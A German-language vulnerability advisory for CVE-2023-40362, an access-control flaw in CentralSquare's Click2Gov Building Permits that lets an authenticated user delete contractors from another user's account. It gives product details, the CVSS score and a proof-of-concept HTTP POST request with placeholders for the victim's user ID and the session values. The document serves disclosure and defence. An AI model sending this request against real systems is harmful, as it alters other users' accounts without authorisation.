
CVE-2023-40362 Schwachstellen-Details und Proof of Concept
CVE-2023-40362 Details zur Schwachstelle und Proof-of-Concept.
Eine Schwachstelle in der Zugriffskontrolle in Click2Gov BP unter der URI /Click2GovBP/mastercontractorlist.html ermöglicht es authentifizierten Benutzern, die
Auftragnehmer von den Konten anderer Benutzer zu löschen – mit der Benutzer-ID des Opfers und den Informationen des zu löschenden Auftragnehmers.
Dies wird dadurch verursacht, dass die Webanwendung nicht prüft, ob der Benutzer berechtigt ist, den Auftragnehmer vom Konto zu löschen, dessen Benutzer-ID angegeben wurde.
Anbieter: CentralSquare
Gemeldet von: Ally Petitt
Entdeckt: 13. Juni 2023
Betroffene Produkte: Click2Gov Building Permits (BP)
Betroffene Versionen: Vor Oktober 2023
CVSS v3: 5.4 - Mittel (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
Die unten gezeigte HTTP-POST-Anfrage kann gesendet werden, um einen Auftragnehmer vom Konto eines Opfers zu löschen. Das CSRF-Token muss dafür gültig sein.
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>